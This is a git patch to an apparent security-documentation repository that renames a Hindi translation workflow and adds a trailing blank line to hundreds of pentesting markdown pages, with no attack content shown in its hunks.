From ae1d2e8ee6991149a02373769fe43fd46045d058 Mon Sep 17 00:00:00 2001
From: Carlos Polop <carlospolop@gmail.com>
Date: Fri, 3 Jan 2025 01:05:32 +0100
Subject: [PATCH] t1

---
 .github/pull_request_template.md                            | 1 +
 .github/workflows/{translate_in.yml => translate_hi.yml}    | 6 +++---
 src/1911-pentesting-fox.md                                  | 1 +
 src/6881-udp-pentesting-bittorrent.md                       | 1 +
 .../browser-extension-pentesting-methodology/README.md      | 1 +
 .../browext-clickjacking.md                                 | 1 +
 .../browext-permissions-and-host_permissions.md             | 1 +
 .../browext-xss-example.md                                  | 1 +
 src/pentesting-web/cache-deception/README.md                | 1 +
 .../cache-deception/cache-poisoning-to-dos.md               | 1 +
 .../cache-poisoning-via-url-discrepancies.md                | 1 +
 .../content-security-policy-csp-bypass/README.md            | 1 +
 .../csp-bypass-self-+-unsafe-inline-with-iframes.md         | 1 +
 .../dangling-markup-html-scriptless-injection/README.md     | 1 +
 .../dangling-markup-html-scriptless-injection/ss-leaks.md   | 1 +
 src/pentesting-web/deserialization/README.md                | 1 +
 ...jectdataprovider-gadgets-expandedwrapper-and-json.net.md | 1 +
 ...sic-java-deserialization-objectinputstream-readobject.md | 1 +
 .../exploiting-__viewstate-knowing-the-secret.md            | 1 +
 .../deserialization/exploiting-__viewstate-parameter.md     | 1 +
 .../java-dns-deserialization-and-gadgetprobe.md             | 1 +
 .../java-jsf-viewstate-.faces-deserialization.md            | 1 +
 .../java-transformers-to-rutime-exec-payload.md             | 1 +
 ...ndi-java-naming-and-directory-interface-and-log4shell.md | 1 +
 .../nodejs-proto-prototype-pollution/README.md              | 1 +
 .../client-side-prototype-pollution.md                      | 1 +
 .../express-prototype-pollution-gadgets.md                  | 1 +
 .../prototype-pollution-to-rce.md                           | 1 +
 .../php-deserialization-+-autoload-classes.md               | 1 +
 .../deserialization/python-yaml-deserialization.md          | 1 +
 src/pentesting-web/deserialization/ruby-_json-pollution.md  | 1 +
 src/pentesting-web/deserialization/ruby-class-pollution.md  | 1 +
 src/pentesting-web/file-inclusion/README.md                 | 1 +
 ...ess.zlib-+-php_stream_prefer_studio-+-path-disclosure.md | 1 +
 .../file-inclusion/lfi2rce-via-eternal-waiting.md           | 1 +
 .../file-inclusion/lfi2rce-via-nginx-temp-files.md          | 1 +
 .../file-inclusion/lfi2rce-via-php-filters.md               | 1 +
 src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md    | 1 +
 .../file-inclusion/lfi2rce-via-segmentation-fault.md        | 1 +
 .../file-inclusion/lfi2rce-via-temp-file-uploads.md         | 1 +
 src/pentesting-web/file-inclusion/phar-deserialization.md   | 1 +
 .../file-inclusion/via-php_session_upload_progress.md       | 1 +
 src/pentesting-web/file-upload/README.md                    | 1 +
 .../file-upload/pdf-upload-xxe-and-cors-bypass.md           | 1 +
 src/pentesting-web/hacking-with-cookies/README.md           | 1 +
 src/pentesting-web/hacking-with-cookies/cookie-bomb.md      | 1 +
 .../hacking-with-cookies/cookie-jar-overflow.md             | 1 +
 src/pentesting-web/hacking-with-cookies/cookie-tossing.md   | 1 +
 src/pentesting-web/http-connection-request-smuggling.md     | 1 +
 src/pentesting-web/http-request-smuggling/README.md         | 1 +
 .../browser-http-request-smuggling.md                       | 1 +
 .../request-smuggling-in-http-2-downgrades.md               | 1 +
 src/pentesting-web/http-response-smuggling-desync.md        | 1 +
 src/pentesting-web/idor.md                                  | 1 +
 src/pentesting-web/iframe-traps.md                          | 1 +
 src/pentesting-web/ldap-injection.md                        | 1 +
 src/pentesting-web/login-bypass/README.md                   | 1 +
 src/pentesting-web/login-bypass/sql-login-bypass.md         | 1 +
 src/pentesting-web/nosql-injection.md                       | 1 +
 src/pentesting-web/oauth-to-account-takeover.md             | 1 +
 src/pentesting-web/open-redirect.md                         | 1 +
 src/pentesting-web/orm-injection.md                         | 1 +
 src/pentesting-web/parameter-pollution.md                   | 1 +
 src/pentesting-web/phone-number-injections.md               | 1 +
 src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md | 1 +
 .../pocs-and-polygloths-cheatsheet/web-vulns-list.md        | 1 +
 src/pentesting-web/postmessage-vulnerabilities/README.md    | 1 +
 .../blocking-main-page-to-steal-postmessage.md              | 1 +
 .../bypassing-sop-with-iframes-1.md                         | 1 +
 .../bypassing-sop-with-iframes-2.md                         | 1 +
 .../steal-postmessage-modifying-iframe-location.md          | 1 +
 src/pentesting-web/proxy-waf-protections-bypass.md          | 1 +
 src/pentesting-web/race-condition.md                        | 1 +
 src/pentesting-web/rate-limit-bypass.md                     | 1 +
 src/pentesting-web/registration-vulnerabilities.md          | 1 +
 .../regular-expression-denial-of-service-redos.md           | 1 +
 src/pentesting-web/reset-password.md                        | 1 +
 src/pentesting-web/reverse-tab-nabbing.md                   | 1 +
 src/pentesting-web/saml-attacks/README.md                   | 1 +
 src/pentesting-web/saml-attacks/saml-basics.md              | 1 +
 .../server-side-inclusion-edge-side-inclusion-injection.md  | 1 +
 src/pentesting-web/sql-injection/README.md                  | 1 +
 src/pentesting-web/sql-injection/cypher-injection-neo4j.md  | 1 +
 src/pentesting-web/sql-injection/ms-access-sql-injection.md | 1 +
 src/pentesting-web/sql-injection/mssql-injection.md         | 1 +
 src/pentesting-web/sql-injection/mysql-injection/README.md  | 1 +
 .../sql-injection/mysql-injection/mysql-ssrf.md             | 1 +
 src/pentesting-web/sql-injection/oracle-injection.md        | 1 +
 .../sql-injection/postgresql-injection/README.md            | 1 +
 .../big-binary-files-upload-postgresql.md                   | 1 +
 .../dblink-lo_import-data-exfiltration.md                   | 1 +
 ...-port-scanner-and-ntlm-chanllenge-response-disclosure.md | 1 +
 .../postgresql-injection/pl-pgsql-password-bruteforce.md    | 1 +
 .../postgresql-injection/rce-with-postgresql-extensions.md  | 1 +
 .../postgresql-injection/rce-with-postgresql-languages.md   | 1 +
 src/pentesting-web/sql-injection/sqlmap.md                  | 1 +
 src/pentesting-web/sql-injection/sqlmap/README.md           | 1 +
 .../sql-injection/sqlmap/second-order-injection-sqlmap.md   | 1 +
 .../ssrf-server-side-request-forgery/README.md              | 1 +
 .../ssrf-server-side-request-forgery/cloud-ssrf.md          | 1 +
 .../ssrf-vulnerable-platforms.md                            | 1 +
 .../ssrf-server-side-request-forgery/url-format-bypass.md   | 1 +
 .../ssti-server-side-template-injection/README.md           | 1 +
 .../el-expression-language.md                               | 1 +
 .../ssti-server-side-template-injection/jinja2-ssti.md      | 1 +
 src/pentesting-web/timing-attacks.md                        | 1 +
 src/pentesting-web/unicode-injection/README.md              | 1 +
 .../unicode-injection/unicode-normalization.md              | 1 +
 src/pentesting-web/uuid-insecurities.md                     | 1 +
 src/pentesting-web/web-tool-wfuzz.md                        | 1 +
 src/pentesting-web/web-vulnerabilities-methodology.md       | 1 +
 .../web-vulnerabilities-methodology/README.md               | 1 +
 src/pentesting-web/websocket-attacks.md                     | 1 +
 src/pentesting-web/xpath-injection.md                       | 1 +
 src/pentesting-web/xs-search.md                             | 1 +
 src/pentesting-web/xs-search/README.md                      | 1 +
 .../xs-search/connection-pool-by-destination-example.md     | 1 +
 src/pentesting-web/xs-search/connection-pool-example.md     | 1 +
 .../xs-search/cookie-bomb-+-onerror-xs-leak.md              | 1 +
 src/pentesting-web/xs-search/css-injection/README.md        | 1 +
 .../xs-search/css-injection/css-injection-code.md           | 1 +
 .../xs-search/event-loop-blocking-+-lazy-images.md          | 1 +
 .../xs-search/javascript-execution-xs-leak.md               | 1 +
 .../xs-search/performance.now-+-force-heavy-task.md         | 1 +
 src/pentesting-web/xs-search/performance.now-example.md     | 1 +
 src/pentesting-web/xs-search/url-max-length-client-side.md  | 1 +
 ...ection-extensible-stylesheet-language-transformations.md | 1 +
 src/pentesting-web/xss-cross-site-scripting/README.md       | 1 +
 .../xss-cross-site-scripting/abusing-service-workers.md     | 1 +
 .../xss-cross-site-scripting/chrome-cache-to-xss.md         | 1 +
 .../xss-cross-site-scripting/debugging-client-side-js.md    | 1 +
 .../xss-cross-site-scripting/dom-clobbering.md              | 1 +
 src/pentesting-web/xss-cross-site-scripting/dom-invader.md  | 1 +
 src/pentesting-web/xss-cross-site-scripting/dom-xss.md      | 1 +
 .../xss-cross-site-scripting/iframes-in-xss-and-csp.md      | 1 +
 .../xss-cross-site-scripting/integer-overflow.md            | 1 +
 src/pentesting-web/xss-cross-site-scripting/js-hoisting.md  | 1 +
 .../xss-cross-site-scripting/other-js-tricks.md             | 1 +
 .../xss-cross-site-scripting/pdf-injection.md               | 1 +
 .../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md | 1 +
 src/pentesting-web/xss-cross-site-scripting/shadow-dom.md   | 1 +
 src/pentesting-web/xss-cross-site-scripting/sniff-leak.md   | 1 +
 .../some-same-origin-method-execution.md                    | 1 +
 .../xss-cross-site-scripting/steal-info-js.md               | 1 +
 .../xss-cross-site-scripting/xss-in-markdown.md             | 1 +
 src/pentesting-web/xssi-cross-site-script-inclusion.md      | 1 +
 src/pentesting-web/xxe-xee-xml-external-entity.md           | 1 +
 .../escaping-from-gui-applications/README.md                | 1 +
 src/physical-attacks/firmware-analysis/README.md            | 1 +
 .../firmware-analysis/bootloader-testing.md                 | 1 +
 .../firmware-analysis/firmware-integrity.md                 | 1 +
 src/physical-attacks/physical-attacks.md                    | 1 +
 src/radio-hacking/README.md                                 | 1 +
 src/radio-hacking/low-power-wide-area-network.md            | 1 +
 src/radio-hacking/pentesting-ble-bluetooth-low-energy.md    | 1 +
 src/radio-hacking/pentesting-rfid.md                        | 1 +
 .../arbitrary-write-2-exec/README.md                        | 1 +
 .../arbitrary-write-2-exec/aw2exec-__malloc_hook.md         | 1 +
 .../arbitrary-write-2-exec/aw2exec-got-plt.md               | 1 +
 .../aws2exec-.dtors-and-.fini_array.md                      | 1 +
 .../common-binary-protections-and-bypasses/README.md        | 1 +
 .../common-binary-protections-and-bypasses/aslr/README.md   | 1 +
 .../common-binary-protections-and-bypasses/aslr/ret2plt.md  | 1 +
 .../common-binary-protections-and-bypasses/no-exec-nx.md    | 1 +
 .../common-binary-protections-and-bypasses/pie/README.md    | 1 +
 .../pie/bypassing-canary-and-pie.md                         | 1 +
 .../common-binary-protections-and-bypasses/relro.md         | 1 +
 .../stack-canaries/README.md                                | 1 +
 .../stack-canaries/bf-forked-stack-canaries.md              | 1 +
 .../stack-canaries/print-stack-canary.md                    | 1 +
 .../common-exploiting-problems.md                           | 1 +
 .../linux-exploiting-basic-esp/elf-tricks.md                | 1 +
 .../linux-exploiting-basic-esp/format-strings/README.md     | 1 +
 .../format-strings/format-strings-template.md               | 1 +
 .../linux-exploiting-basic-esp/one-gadget.md                | 1 +
 .../linux-exploiting-basic-esp/stack-overflow/README.md     | 1 +
 .../stack-overflow/pointer-redirecting.md                   | 1 +
 .../linux-exploiting-basic-esp/stack-overflow/ret2csu.md    | 1 +
 .../stack-overflow/ret2dlresolve.md                         | 1 +
 .../stack-overflow/ret2esp-ret2reg.md                       | 1 +
 .../stack-overflow/ret2lib/README.md                        | 1 +
 .../ret2lib/rop-leaking-libc-address/README.md              | 1 +
 .../rop-leaking-libc-address/rop-leaking-libc-template.md   | 1 +
 .../linux-exploiting-basic-esp/stack-overflow/ret2ret.md    | 1 +
 .../linux-exploiting-basic-esp/stack-overflow/ret2win.md    | 1 +
 .../stack-overflow/rop-return-oriented-programing.md        | 1 +
 .../stack-overflow/rop-syscall-execv.md                     | 1 +
 .../stack-overflow/srop-sigreturn-oriented-programming.md   | 1 +
 .../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md   | 1 +
 .../stack-overflow/stack-shellcode.md                       | 1 +
 src/reversing/common-api-used-in-malware.md                 | 1 +
 src/reversing/cryptographic-algorithms/README.md            | 1 +
 .../cryptographic-algorithms/unpacking-binaries.md          | 1 +
 src/reversing/reversing-tools-basic-methods/README.md       | 1 +
 src/reversing/reversing-tools-basic-methods/angr/README.md  | 1 +
 .../reversing-tools-basic-methods/angr/angr-examples.md     | 1 +
 src/reversing/reversing-tools-basic-methods/blobrunner.md   | 1 +
 src/reversing/reversing-tools-basic-methods/cheat-engine.md | 1 +
 .../satisfiability-modulo-theories-smt-z3.md                | 1 +
 src/reversing/reversing-tools/README.md                     | 1 +
 src/reversing/reversing-tools/blobrunner.md                 | 1 +
 src/reversing/word-macros.md                                | 1 +
 src/stego/esoteric-languages.md                             | 1 +
 src/stego/stego-tricks.md                                   | 1 +
 src/todo/6881-udp-pentesting-bittorrent.md                  | 1 +
 src/todo/android-forensics.md                               | 1 +
 src/todo/burp-suite.md                                      | 1 +
 src/todo/cookies-policy.md                                  | 1 +
 src/todo/hardware-hacking/README.md                         | 1 +
 src/todo/hardware-hacking/fault_injection_attacks.md        | 1 +
 src/todo/hardware-hacking/i2c.md                            | 1 +
 src/todo/hardware-hacking/jtag.md                           | 1 +
 src/todo/hardware-hacking/radio.md                          | 1 +
 src/todo/hardware-hacking/side_channel_analysis.md          | 1 +
 src/todo/hardware-hacking/spi.md                            | 1 +
 src/todo/hardware-hacking/uart.md                           | 1 +
 src/todo/industrial-control-systems-hacking/README.md       | 1 +
 src/todo/industrial-control-systems-hacking/modbus.md       | 1 +
 src/todo/interesting-http.md                                | 1 +
 src/todo/investment-terms.md                                | 1 +
 .../llm-training-data-preparation/0.-basic-llm-concepts.md  | 1 +
 src/todo/llm-training-data-preparation/1.-tokenizing.md     | 1 +
 src/todo/llm-training-data-preparation/2.-data-sampling.md  | 1 +
 .../llm-training-data-preparation/3.-token-embeddings.md    | 1 +
 .../4.-attention-mechanisms.md                              | 1 +
 .../llm-training-data-preparation/5.-llm-architecture.md    | 1 +
 .../6.-pre-training-and-loading-models.md                   | 1 +
 .../7.0.-lora-improvements-in-fine-tuning.md                | 1 +
 .../7.1.-fine-tuning-for-classification.md                  | 1 +
 .../7.2.-fine-tuning-to-follow-instructions.md              | 1 +
 src/todo/llm-training-data-preparation/README.md            | 1 +
 src/todo/misc.md                                            | 1 +
 src/todo/more-tools.md                                      | 1 +
 src/todo/online-platforms-with-api.md                       | 1 +
 src/todo/other-web-tricks.md                                | 1 +
 src/todo/pentesting-dns.md                                  | 1 +
 src/todo/post-exploitation.md                               | 1 +
 src/todo/radio-hacking/README.md                            | 1 +
 src/todo/radio-hacking/fissure-the-rf-framework.md          | 1 +
 src/todo/radio-hacking/flipper-zero/README.md               | 1 +
 src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md       | 1 +
 src/todo/radio-hacking/flipper-zero/fz-ibutton.md           | 1 +
 src/todo/radio-hacking/flipper-zero/fz-infrared.md          | 1 +
 src/todo/radio-hacking/flipper-zero/fz-nfc.md               | 1 +
 src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md           | 1 +
 src/todo/radio-hacking/ibutton.md                           | 1 +
 src/todo/radio-hacking/infrared.md                          | 1 +
 src/todo/radio-hacking/low-power-wide-area-network.md       | 1 +
 .../radio-hacking/pentesting-ble-bluetooth-low-energy.md    | 1 +
 src/todo/radio-hacking/pentesting-rfid.md                   | 1 +
 src/todo/radio-hacking/proxmark-3.md                        | 1 +
 src/todo/radio-hacking/sub-ghz-rf.md                        | 1 +
 src/todo/references.md                                      | 1 +
 src/todo/rust-basics.md                                     | 1 +
 .../stealing-sensitive-information-disclosure-from-a-web.md | 1 +
 src/todo/test-llms.md                                       | 1 +
 src/todo/tr-069.md                                          | 1 +
 src/welcome/about-the-author.md                             | 1 +
 src/welcome/hacktricks-values-and-faq.md                    | 1 +
 .../active-directory-methodology/README.md                  | 1 +
 .../active-directory-methodology/abusing-ad-mssql.md        | 1 +
 .../acl-persistence-abuse/README.md                         | 1 +
 .../acl-persistence-abuse/shadow-credentials.md             | 1 +
 .../active-directory-methodology/ad-certificates.md         | 1 +
 .../active-directory-methodology/ad-certificates/README.md  | 1 +
 .../ad-certificates/account-persistence.md                  | 1 +
 .../ad-certificates/certificate-theft.md                    | 1 +
 .../ad-certificates/domain-escalation.md                    | 1 +
 .../ad-certificates/domain-persistence.md                   | 1 +
 .../active-directory-methodology/ad-dns-records.md          | 1 +
 .../ad-information-in-printers.md                           | 1 +
 .../active-directory-methodology/asreproast.md              | 1 +
 .../active-directory-methodology/bloodhound.md              | 1 +
 .../active-directory-methodology/constrained-delegation.md  | 1 +
 .../active-directory-methodology/custom-ssp.md              | 1 +
 .../active-directory-methodology/dcshadow.md                | 1 +
 .../active-directory-methodology/dcsync.md                  | 1 +
 .../active-directory-methodology/diamond-ticket.md          | 1 +
 .../active-directory-methodology/dsrm-credentials.md        | 1 +
 .../external-forest-domain-one-way-outbound.md              | 1 +
 .../external-forest-domain-oneway-inbound.md                | 1 +
 .../active-directory-methodology/golden-ticket.md           | 1 +
 .../active-directory-methodology/kerberoast.md              | 1 +
 .../active-directory-methodology/kerberos-authentication.md | 1 +
 .../kerberos-double-hop-problem.md                          | 1 +
 src/windows-hardening/active-directory-methodology/laps.md  | 1 +
 .../over-pass-the-hash-pass-the-key.md                      | 1 +
 .../active-directory-methodology/pass-the-ticket.md         | 1 +
 .../active-directory-methodology/password-spraying.md       | 1 +
 .../printers-spooler-service-abuse.md                       | 1 +
 .../active-directory-methodology/printnightmare.md          | 1 +
 .../privileged-groups-and-token-privileges.md               | 1 +
 .../active-directory-methodology/rdp-sessions-abuse.md      | 1 +
 .../resource-based-constrained-delegation.md                | 1 +
 .../active-directory-methodology/security-descriptors.md    | 1 +
 .../active-directory-methodology/sid-history-injection.md   | 1 +
 .../active-directory-methodology/silver-ticket.md           | 1 +
 .../active-directory-methodology/skeleton-key.md            | 1 +
 .../unconstrained-delegation.md                             | 1 +
 .../authentication-credentials-uac-and-efs.md               | 1 +
 .../authentication-credentials-uac-and-efs/README.md        | 1 +
 .../uac-user-account-control.md                             | 1 +
 src/windows-hardening/av-bypass.md                          | 1 +
 src/windows-hardening/basic-cmd-for-pentesters.md           | 1 +
 .../basic-powershell-for-pentesters/README.md               | 1 +
 .../basic-powershell-for-pentesters/powerview.md            | 1 +
 .../checklist-windows-privilege-escalation.md               | 1 +
 src/windows-hardening/cobalt-strike.md                      | 1 +
 src/windows-hardening/lateral-movement/README.md            | 1 +
 src/windows-hardening/lateral-movement/atexec.md            | 1 +
 src/windows-hardening/lateral-movement/dcom-exec.md         | 1 +
 .../lateral-movement/psexec-and-winexec.md                  | 1 +
 src/windows-hardening/lateral-movement/smbexec.md           | 1 +
 src/windows-hardening/lateral-movement/winrm.md             | 1 +
 src/windows-hardening/lateral-movement/wmiexec.md           | 1 +
 src/windows-hardening/ntlm/README.md                        | 1 +
 src/windows-hardening/ntlm/atexec.md                        | 1 +
 src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md    | 1 +
 src/windows-hardening/ntlm/psexec-and-winexec.md            | 1 +
 src/windows-hardening/ntlm/smbexec.md                       | 1 +
 src/windows-hardening/ntlm/winrm.md                         | 1 +
 src/windows-hardening/ntlm/wmiexec.md                       | 1 +
 src/windows-hardening/stealing-credentials/README.md        | 1 +
 .../stealing-credentials/credentials-mimikatz.md            | 1 +
 .../stealing-credentials/credentials-protections.md         | 1 +
 .../stealing-credentials/wts-impersonator.md                | 1 +
 .../windows-local-privilege-escalation/README.md            | 1 +
 .../windows-local-privilege-escalation/access-tokens.md     | 1 +
 .../acls-dacls-sacls-aces.md                                | 1 +
 ...data-addsubdirectory-permission-over-service-registry.md | 1 +
 .../windows-local-privilege-escalation/com-hijacking.md     | 1 +
 .../create-msi-with-wix.md                                  | 1 +
 .../windows-local-privilege-escalation/dll-hijacking.md     | 1 +
 .../dll-hijacking/README.md                                 | 1 +
 .../writable-sys-path-+dll-hijacking-privesc.md             | 1 +
 .../dpapi-extracting-passwords.md                           | 1 +
 .../from-high-integrity-to-system-with-name-pipes.md        | 1 +
 .../windows-local-privilege-escalation/integrity-levels.md  | 1 +
 .../windows-local-privilege-escalation/juicypotato.md       | 1 +
 .../leaked-handle-exploitation.md                           | 1 +
 .../windows-local-privilege-escalation/msi-wrapper.md       | 1 +
 .../named-pipe-client-impersonation.md                      | 1 +
 .../privilege-escalation-abusing-tokens.md                  | 1 +
 .../privilege-escalation-abusing-tokens/README.md           | 1 +
 .../privilege-escalation-with-autorun-binaries.md           | 1 +
 .../roguepotato-and-printspoofer.md                         | 1 +
 .../sedebug-+-seimpersonate-copy-token.md                   | 1 +
 .../seimpersonate-from-high-to-system.md                    | 1 +
 .../windows-c-payloads.md                                   | 1 +
 .../windows-security-controls/uac-user-account-control.md   | 1 +
 350 files changed, 352 insertions(+), 3 deletions(-)
 rename .github/workflows/{translate_in.yml => translate_hi.yml} (98%)

diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
index 3f2fd0a72..68ca5efc8 100644
--- a/.github/pull_request_template.md
+++ b/.github/pull_request_template.md
@@ -8,3 +8,4 @@ Thank you for contributing to HackTricks!
 
 
 
+
diff --git a/.github/workflows/translate_in.yml b/.github/workflows/translate_hi.yml
similarity index 98%
rename from .github/workflows/translate_in.yml
rename to .github/workflows/translate_hi.yml
index f2a65762a..ffc58f72d 100644
--- a/.github/workflows/translate_in.yml
+++ b/.github/workflows/translate_hi.yml
@@ -1,4 +1,4 @@
-name: Translator to IN (Hindi)
+name: Translator to HI (Hindi)
 
 on:
   push:
@@ -10,7 +10,7 @@ on:
       - '.github/**'
   workflow_dispatch:
 
-concurrency: in
+concurrency: hi
 
 permissions:
   id-token: write
@@ -22,7 +22,7 @@ jobs:
     environment: prod
     env:
       LANGUAGE: Hindi
-      BRANCH: in
+      BRANCH: hi
 
     steps:
       - name: Checkout code
diff --git a/src/1911-pentesting-fox.md b/src/1911-pentesting-fox.md
index 54a85f3aa..d387bf258 100644
--- a/src/1911-pentesting-fox.md
+++ b/src/1911-pentesting-fox.md
@@ -29,3 +29,4 @@ InfluxDB
 {{#include ./banners/hacktricks-training.md}}
 
 
+
diff --git a/src/6881-udp-pentesting-bittorrent.md b/src/6881-udp-pentesting-bittorrent.md
index 4ba81738b..37e73b55f 100644
--- a/src/6881-udp-pentesting-bittorrent.md
+++ b/src/6881-udp-pentesting-bittorrent.md
@@ -3,3 +3,4 @@
 {{#include ./banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
index b541ad888..774c6a701 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -757,3 +757,4 @@ Project Neto is a Python 3 package conceived to analyse and unravel hidden featu
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
index ea330373d..9f9865589 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
@@ -101,3 +101,4 @@ browext-xss-example.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index cc3df2557..d376f42ed 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -113,3 +113,4 @@ However, tightening security measures often results in decreased flexibility and
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
index e37152c7a..328a19e0b 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
@@ -118,3 +118,4 @@ Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerabl
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md
index ed0460439..7c589d1a0 100644
--- a/src/pentesting-web/cache-deception/README.md
+++ b/src/pentesting-web/cache-deception/README.md
@@ -242,3 +242,4 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
index 158968471..24e0b77e2 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
@@ -145,3 +145,4 @@ Cache: hit
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
index ea68859c1..d33a95bf0 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
@@ -52,3 +52,4 @@ Several cache servers will always cache a response if it's identified as static.
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
index 916ce47d0..f395dfa98 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -818,3 +818,4 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
index 5c04bedaa..cdbe1d288 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
@@ -66,3 +66,4 @@ window.frames[0].document.head.appendChild(script)
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
index 328af2ee3..ef056696a 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
@@ -263,3 +263,4 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
index 74e45ac5e..80ffd95be 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md
index b95088891..56b471f0c 100644
--- a/src/pentesting-web/deserialization/README.md
+++ b/src/pentesting-web/deserialization/README.md
@@ -989,3 +989,4 @@ Check for more details in the [**original post**](https://github.blog/security/v
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index 781fcd0b2..95d39cedd 100644
--- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -197,3 +197,4 @@ namespace DeserializationTests
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
index 79bfa3825..0ad3bf5f8 100644
--- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
+++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
@@ -89,3 +89,4 @@ As you can see in this very basic example, the "vulnerability" here appears beca
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
index ca88ae33e..6fc4df6ae 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
@@ -5,3 +5,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 491ee57d0..7092bd9a0 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -214,3 +214,4 @@ Check for [further information here](<https://github.com/carlospolop/hacktricks/
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
